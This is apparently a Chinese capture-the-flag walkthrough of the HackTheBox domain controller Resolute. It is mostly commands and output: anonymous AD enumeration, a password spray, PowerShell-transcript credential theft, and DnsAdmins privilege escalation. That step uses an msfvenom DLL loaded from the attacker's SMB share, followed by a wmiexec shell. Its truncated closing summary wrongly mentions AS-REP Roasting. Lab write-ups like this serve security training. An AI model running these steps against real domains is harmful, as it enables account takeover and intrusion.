nmap -A -T4 10.10.10.169
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-16 01:30 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.65% done; ETC: 01:30 (0:00:01 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.32% done; ETC: 01:32 (0:00:00 remaining)
Nmap scan report for 10.10.10.169
Host is up (0.72s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-16 06:38:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/16%OT=88%CT=1%CU=30146%PV=Y%DS=2%DC=T%G=Y%TM=63C4EF9
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:A)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=10B%
OS:TI=I%CI=I%TS=A)OPS(O1=M537NW8ST11%O2=M537NW8ST11%O3=M537NW8NNT11%O4=M537
OS:NW8ST11%O5=M537NW8ST11%O6=M537ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W
OS:5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M537NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=
OS:)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=80%CD=Z)Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2h47m02s, deviation: 4h37m11s, median: 7m00s
| smb2-time:
| date: 2023-01-16T06:39:12
|_ start_date: 2023-01-16T06:36:35
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2023-01-15T22:39:13-08:00TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 294.26 ms 10.10.16.1
2 294.29 ms 10.10.10.169OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.78 seconds发现目标机器是域控开放了SMB协议与Rpc协议,593端口可能是DOCOM远程过程对象调用RPC,域名megabank.local
因为网络有点卡我在VPS上挂的隧道连接的HTB正常命令不需要proxychains
命令:proxychains ./windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U
回显:[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[proxychains] DLL init: proxychains-ng 4.16[+] No username provided. Will try anonymous bind.[+] Using Domain Controller at: 10.10.10.169[+] Getting defaultNamingContext from Root DSE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:389 ... OK[+] Found: DC=megabank,DC=local[+] Attempting bind[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:389 ... OK[+] ...success! Binded as:[+] None[+] Enumerating all AD users[+] Found 25 users:cn: Guestcn: DefaultAccountcn: Ryan BertranduserPrincipalName: ryan@megabank.localcn: Marko NovakuserPrincipalName: marko@megabank.localcn: Sunita RahmanuserPrincipalName: sunita@megabank.localcn: Abigail JeffersuserPrincipalName: abigail@megabank.localcn: Marcus StronguserPrincipalName: marcus@megabank.localcn: Sally MayuserPrincipalName: sally@megabank.localcn: Fred CarruserPrincipalName: fred@megabank.localcn: Angela PerkinsuserPrincipalName: angela@megabank.localcn: Felicia CarteruserPrincipalName: felicia@megabank.localcn: Gustavo PallierosuserPrincipalName: gustavo@megabank.localcn: Ulf BerguserPrincipalName: ulf@megabank.localcn: Stevie GerrarduserPrincipalName: stevie@megabank.localcn: Claire NormanuserPrincipalName: claire@megabank.localcn: Paulo AlcobiauserPrincipalName: paulo@megabank.localcn: Steve RideruserPrincipalName: steve@megabank.localcn: Annette NilssonuserPrincipalName: annette@megabank.localcn: Annika LarsonuserPrincipalName: annika@megabank.localcn: Per OlssonuserPrincipalName: per@megabank.localcn: Claude SegaluserPrincipalName: claude@megabank.localcn: Melanie PurkisuserPrincipalName: melanie@megabank.localcn: Zach ArmstronguserPrincipalName: zach@megabank.localcn: Simon FaradayuserPrincipalName: simon@megabank.localcn: Naoki YamamotouserPrincipalName: naoki@megabank.local[*] Bye!
命令:proxychains ./windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
回显:[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:389 ... OK[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:389 ... OKbadPasswordTime: 0badPasswordTime: 0badPasswordTime: 0description: Account created. Password set to Welcome123!badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0badPasswordTime: 0 发现有一个描述信息存在疑似密码Welcome123!
这是另一种方式相比上面通过389端口进行查询rpcclient是通过445端口Rpc进行域描述查询的,当然连接一个 samba 或 SMB server 不需要用户名及密码验证才可以使用,
但是从 Windows XP SP2 和 Windows Server 2003 开始系统就不支持空会话的连接了,HTB是开放了空连接但是在护网实战当中关于预认证和开启445空会话的情况很少,都是通过CVE进行
攻击,错误配置会比较少。
命令:proxychains rpcclient -U "" -N 10.10.10.169
回显:[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16WARNING: no network interfaces found[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKrpcclient $>
命令:enumdomusers #枚举用户
回显:rpcclient $> enumdomusersuser:[Administrator] rid:[0x1f4]user:[Guest] rid:[0x1f5]user:[krbtgt] rid:[0x1f6]user:[DefaultAccount] rid:[0x1f7]user:[ryan] rid:[0x451]user:[marko] rid:[0x457]user:[sunita] rid:[0x19c9]user:[abigail] rid:[0x19ca]user:[marcus] rid:[0x19cb]user:[sally] rid:[0x19cc]user:[fred] rid:[0x19cd]user:[angela] rid:[0x19ce]user:[felicia] rid:[0x19cf]user:[gustavo] rid:[0x19d0]user:[ulf] rid:[0x19d1]user:[stevie] rid:[0x19d2]user:[claire] rid:[0x19d3]user:[paulo] rid:[0x19d4]user:[steve] rid:[0x19d5]user:[annette] rid:[0x19d6]user:[annika] rid:[0x19d7]user:[per] rid:[0x19d8]user:[claude] rid:[0x19d9]user:[melanie] rid:[0x2775]user:[zach] rid:[0x2776]user:[simon] rid:[0x2777]user:[naoki] rid:[0x2778]
命令:querydispinfo #显示用户列表和描述
回显:rpcclient $> querydispinfoindex: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (nullDesc: (null)index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (nullDesc: Built-in account for administering the computer/domainindex: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (nullDesc: (null)index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (nullDesc: (null)index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (nullDesc: (null)index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (nullDesc: (null)index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (nullDesc: (null)index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (nullDesc: A user account managed by the system.index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (nullDesc: (null)index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domainindex: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (nullDesc: (null)index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Accountindex: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (nullDesc: (null)index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (nullDesc: (null)index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (nullDesc: (null)index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (nullDesc: (null)index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan BertrandDesc: (null)index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (nullDesc: (null)index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (nullDesc: (null)index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (nullDesc: (null)index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (nullDesc: (null)index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (nullDesc: (null)index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
跟上面的windapsearch一样查询描述发现了疑似密码Welcome123!账号是marko
user:password marko:Welcome123!
命令:proxychains crackmapexec smb 10.10.10.169 -u marko -p 'Welcome123!' --continue-on-success
回显:[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[*] First time use detected[*] Creating home directory structure[*] Creating default workspace[*] Initializing SMB protocol database[*] Initializing SSH protocol database[*] Initializing FTP protocol database[*] Initializing WINRM protocol database[*] Initializing LDAP protocol database[*] Initializing RDP protocol database[*] Initializing MSSQL protocol database[*] Copying default configuration file[*] Generating SSL certificate[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OK[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:135 ... OKSMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
发现marko账号不正确,那会不会其他账号也使用了这个密码呢,尝试一下密码喷洒攻击。
命令:proxychains ldapsearch -H ldap://10.10.10.169 -x -b 'dc=megabank,dc=local' -s sub "*" | grep lock
回显:[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:389 ... OKlockoutDuration: -18000000000lockOutObservationWindow: -18000000000lockoutThreshold: 0lockoutDuration: -18000000000lockOutObservationWindow: -18000000000lockoutThreshold: 0
没有账号锁定策略
首先将发现的域用户名提取存储到users.txt并使用crackmapexec进行密码喷洒
命令:proxychains crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
回显:[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OK[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:135 ... OKSMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123![proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OK[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:445 ... OKSMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
重要信息: SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
发现melanie账号喷洒成功
命令:python bloodhound.py -d megabank.local -u melanie -p Welcome123! -c all -ns 10.10.10.169
注意的问题:开始的时候我是用了proxychains通过VPS的端口映射去收集域信息但是失败,在VPS上执行的可以抓取信息
bloodhound分析:melanie账号具有CanPSRemote权限,可以进行远程登录,下面尝试evil-winrm登录域控。CanPSRemote权限权限解释:The user MELANIE@MEGABANK.LOCAL has the capability to create a PSRemote Connection with the computer RESOLUTE.MEGABANK.LOCAL.PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.Note: This edge does not guarantee privileged execution.
命令:proxychains evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
信息收集发现了C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt文件,PSTranscripts目录是隐藏的,
需要使用dir -force进行发现。
使用download命令将文件下载到本地进行分析,文件内容: **********************Windows PowerShell transcript startStart time: 20191203063201Username: MEGABANK\ryanRunAs User: MEGABANK\ryanMachine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)Host Application: C:\Windows\system32\wsmprovhost.exe -EmbeddingProcess ID: 2800PSVersion: 5.1.14393.2273PSEdition: DesktopPSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273BuildVersion: 10.0.14393.2273CLRVersion: 4.0.30319.42000WSManStackVersion: 3.0PSRemotingProtocolVersion: 2.3SerializationVersion: 1.1.0.1**********************Command start time: 20191203063455**********************PS>TerminatingError(): "System error.">> CommandInvocation(Invoke-Expression): "Invoke-Expression">> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }">> CommandInvocation(Out-String): "Out-String">> ParameterBinding(Out-String): name="Stream"; value="True"**********************Command start time: 20191203063455**********************PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "PS megabank\ryan@RESOLUTE Documents>**********************Command start time: 20191203063515**********************PS>CommandInvocation(Invoke-Expression): "Invoke-Expression">> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }">> CommandInvocation(Out-String): "Out-String">> ParameterBinding(Out-String): name="Stream"; value="True"**********************Windows PowerShell transcript startStart time: 20191203063515Username: MEGABANK\ryanRunAs User: MEGABANK\ryanMachine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)Host Application: C:\Windows\system32\wsmprovhost.exe -EmbeddingProcess ID: 2800PSVersion: 5.1.14393.2273PSEdition: DesktopPSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273BuildVersion: 10.0.14393.2273CLRVersion: 4.0.30319.42000WSManStackVersion: 3.0PSRemotingProtocolVersion: 2.3SerializationVersion: 1.1.0.1********************************************Command start time: 20191203063515**********************PS>CommandInvocation(Out-String): "Out-String">> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"cmd : The syntax of this command is:At line:1 char:1+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException+ FullyQualifiedErrorId : NativeCommandErrorcmd : The syntax of this command is:At line:1 char:1+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException+ FullyQualifiedErrorId : NativeCommandError**********************Windows PowerShell transcript startStart time: 20191203063515Username: MEGABANK\ryanRunAs User: MEGABANK\ryanMachine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)Host Application: C:\Windows\system32\wsmprovhost.exe -EmbeddingProcess ID: 2800PSVersion: 5.1.14393.2273PSEdition: DesktopPSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273BuildVersion: 10.0.14393.2273CLRVersion: 4.0.30319.42000WSManStackVersion: 3.0PSRemotingProtocolVersion: 2.3SerializationVersion: 1.1.0.1**********************
重要信息:+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
可以看出发现这个文件是powershell执行信息记录日志文件可能是启用了PowerShell转录日志记录在这里面发现了MEGABANK\ryan:Serv3r4Admin4cc123!使用bloodhound进行分析下该账号。
分析结果:
MEGABANK\ryan用户隶属于CONTRACTORS@MEGABANK.LOCAL的成员
CONTRACTORS@MEGABANK.LOCAL组对域控具有CanPSRemote权限可以进远程登录
在bloodhound中显示MEGABANK\ryan账号信息Unrolled Group Membership发现一下内容:
MEGABANK\ryan用户隶属于CONTRACTORS@MEGABANK.LOCAL的成员
CONTRACTORS@MEGABANK.LOCAL是组DNSADMINS@MEGABANK.LOCAL的成员思路整理:ryan账号具有CanPSRemote权限尝试能否登录到域控,登录成功后因为ryan账号属于CONTRACTORS@MEGABANK.LOCAL组, CONTRACTORS@MEGABANK.LOCAL组有属于DNSADMINS@MEGABANK.LOCAL的成员,可以尝试下滥用DNS Admin组进行权限提升后拿到system权限从而完全控制域控。
Evil命令登录:proxychains evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
查看bloodhound分析的是否正确,ryan是否属于DNSADMIN组,使用whoami /groups命令进行查看
回显:*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:5985 ... OK[proxychains] Strict chain ... 45.63.14.160:8000 ... 10.10.10.169:5985 ... OKGROUP INFORMATION-----------------Group Name Type SIDAttributes========================================== ================ ============================================== ===============================================================Everyone Well-known group S-1-1-0Mandatory group, Enabled by default, Enabled groupBUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled groupBUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled groupBUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\NETWORK Well-known group S-1-5-2Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled groupMEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled groupMEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local GroupNT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled groupMandatory Label\Medium Mandatory Level Label S-1-16-8192
确实属于MEGABANK\DnsAdmins组
DNS Admin组描述:DNSAdmins 组的成员可以访问网络DNS信息,默认权限如下:读取、写入、创建所有子对象、删除子对象、特殊权限,DNSAdmins 没有启动或停止 DNS 服务的能力,但管理员授予该组成员该权限并不罕见,当dnsadmins 组的成员被授予该权限时可用于通过 dll 注入将权限提升到管理员。DNS Admin组提权参考文章:https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2http://t.zoukankan.com/backlion-p-9888851.html攻击利用:msfvenom生成利用dll命令:msfvenom -p windows/x64/exec cmd='net user administrator Hack@123! /domain' -f dll > 666.dll会在当前目录下生成666.dll,administrator:Hack@123!账号用于登录回显:[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x64 from the payloadNo encoder specified, outputting raw payloadPayload size: 308 bytesFinal size of dll file: 8704 bytes使用impacket包下的smbserver.py开启SMB共享,用于加载载荷DLL。命令:python3 smbserver.py share /home/kali/Desktop/temp/回显:Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation[*] Config file parsed[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0[*] Config file parsed[*] Config file parsed[*] Config file parsed[*] Incoming connection (10.10.10.169,49744)[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)[*] User RESOLUTE\RESOLUTE$ authenticated successfully[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:e49c4be2db354722fa97566e8b70dc25:01010000000000008072dd93642ad9010b22281d41e3938400000000010010006d00710042004f00750066004d005400030010006d00710042004f00750066004d0054000200100069004b0061006200490055004c006f000400100069004b0061006200490055004c006f00070008008072dd93642ad901060004000200000008003000300000000000000000000000004000007c98156cf5cb7544a109737d652c69e8d012b63ce8ab077535416d60b20781190a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0039000000000000000000[*] Disconnecting Share(1:IPC$)[*] Disconnecting Share(2:SHARE)[*] Closing down connection (10.10.10.169,49744)[*] Remaining connections []以上RESOLUTE$回显是Evil和重启dns后会打出Evil命令:*Evil-WinRM* PS C:\Users\ryan\Documents> cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.16.9\home\kali\Desktop\temp\666.dll回显:Registry property serverlevelplugindll successfully reset.Command completed successfully.命令说明:dnscmd实用程序可以用来将攻击机SMB的DLL路径设置到Windows注册表中重新启动DNS服务,以加载载荷DLL命令:sc.exe stop dnssc.exe start dns需要注意:DnsAdmins在默认情况下不能重新启动DNS服务,该域管设置了DnsAdmins组具有该权限
administrator:Hack@123!
命令:python3 wmiexec.py administrator@10.10.10.169
回显:python3 wmiexec.py administrator@10.10.10.169Impacket v0.10.0 - Copyright 2022 SecureAuth CorporationPassword:[*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:\>
通过nmap扫描发现是域控机器,使用windapsearch工具发现关闭了预认证使用AS-REP Roasting攻击拿到域账号,通过查询域内账号描述发现
marko:Welcome123!账号将密码写到描述中,通过crackmapexec验证发现无法登录收集之前获得域账号信息并继续使用crackmapexec喷洒密码Welcome123!,
